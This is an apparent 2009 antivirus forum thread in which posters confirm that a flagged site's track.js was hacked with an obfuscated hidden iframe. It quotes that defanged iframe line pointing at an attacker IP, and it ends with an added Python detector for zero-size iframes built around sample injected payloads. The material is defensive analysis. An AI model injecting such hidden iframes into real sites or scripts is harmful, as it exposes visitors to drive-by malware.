system
July 20, 2009, 1:52pm
1
Hi everybody
We think avast is blacklisting our websites, as it is blocking the entire domains (if web protection is activated).
silvashop.com
avlispub.com
ultramind.ws
silvaremoteviewing.com
siga.org
choose-success.org
espsy.org
silva.supportgroup.ws
silvacourses.com
We are sure this is a false positive, our sites are probably blacklisted but we don’t know why. Can anyone help us to get rid of this trojan/false positive? Thank you very much.
system
July 20, 2009, 2:02pm
2
Maybe a member will have the possibility to check the script and HTML code, so we can say if it's hacked or not.
Be patient, another reply will come.
Thanks.
Mr.Agent
nmb
July 20, 2009, 2:08pm
3
system
July 20, 2009, 2:11pm
4
HTML:IFrame-EL Trojan, file: hXtp://silvashop.com/affiliate/scripts/track.js
Is what avast says on the few sites I checked.
nmb
July 20, 2009, 2:14pm
5
system
July 20, 2009, 2:25pm
6
Most likely this javascript has been hacked and modified.
In the js file there is an obfuscated script at the bottom which contains the malicious Iframe.
See the image below
system
July 20, 2009, 2:38pm
7
That's what I was guessing. The detection of Avast! is accurate to this. ;D
system
July 20, 2009, 2:42pm
8
Thanks for your time guys!
system
July 20, 2009, 2:44pm
9
No problem ;D
You're welcome to post again if you want anything else.
Mr.Agent
Hi dominateit,
They never thought it to be benign:
http://wepawet.iseclab.org/view.php?hash=6427d31756277f7ccf230111ba10f109&t=1248116437&type=js
But it does not seem to redirect somewhere now…
the url 95.129.144.229 seems non-existent, and also seemed blacklisted by Spamhaus…
Hidden IFrame redirect…
EDITED for security reasons by me ...iframe src="hxtp://95.129.144.229/1" WIDTH="0%" HEIGHT="0%" style="hidden" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="no" frameborder="0" NORESIZE^^/iframe^
(repeated 1 time)
See the Bad Stuff Detektor report:
No zeroiframes detected!
Check took 3.16 seconds
(Level: 0) Url checked:
hxtp://silvashop.com
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://silvashop.com/affiliate/scripts/track.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (script source)
hxtp://silvashop.com/affiliate/scripts/
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://www.google-analytics.com/urchin.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://edge.quantserve.com/quant.js
Zeroiframes detected on this site: 0
No ad codes identified
polonus
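Added example, not part of the thread and not any poster's or vendor's code: a webmaster-side check for the pattern discussed above, a zero-size iframe appended to a script file, which inspects both the literal file text and percent-encoded string literals. The obfuscation actually used in track.js is not shown in the thread, so percent-encoding is an assumption here, and the sample inputs are constructed and use the documentation address 192.0.2.1.

```python
import re
from urllib.parse import quote, unquote

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""\b(width|height|style|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
ZERO_RE = re.compile(r"^0+(?:\.0+)?(?:px|%)?$", re.I)           # 0, 0%, 0px, 0.0
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
LITERAL_RE = re.compile(r"""(["'])((?:(?!\1)[^\\\n])*)\1""")    # simple JS string literals
ENCODED_LT_RE = re.compile(r"%3c", re.I)                        # percent-encoded "<"

def attrs(tag):
    """Extract the attributes we care about from one <iframe ...> tag."""
    out = {}
    for m in ATTR_RE.finditer(tag):
        out[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return out

def is_hidden(tag):
    """True when width or height is zero, or the style hides the frame."""
    a = attrs(tag)
    zero = any(ZERO_RE.match(a.get(k, "").strip()) for k in ("width", "height"))
    return zero or bool(HIDDEN_CSS_RE.search(a.get("style", "")))

def scan(text):
    """Return [(layer, src)] for hidden iframes; layer is 'literal' or 'decoded'."""
    layers = [("literal", text)]
    for m in LITERAL_RE.finditer(text):
        if ENCODED_LT_RE.search(m.group(2)):        # literal carries encoded markup
            layers.append(("decoded", unquote(m.group(2))))
    hits = []
    for layer, body in layers:
        for tag in IFRAME_RE.findall(body):
            if is_hidden(tag):
                hits.append((layer, attrs(tag).get("src", "")))
    return hits

# Constructed sample inputs (not taken from the affected site).
CLEAN_JS = 'function track(id) { return "aff=" + id; }\n'
PAYLOAD = '<iframe src="http://192.0.2.1/x" WIDTH="0%" HEIGHT="0%" frameborder="0"></iframe>'
PLAIN_JS = CLEAN_JS + "document.write('" + PAYLOAD + "');\n"
ENCODED_JS = CLEAN_JS + "document.write(unescape('" + quote(PAYLOAD, safe="") + "'));\n"

if __name__ == "__main__":
    for name, js in (("clean", CLEAN_JS), ("plain", PLAIN_JS), ("encoded", ENCODED_JS)):
        print(name, scan(js))
```

A hit in the "decoded" layer only means the markup was hidden from a plain text search; other encodings need their own decoding step or a sandboxed JavaScript analysis such as the wepawet report linked above.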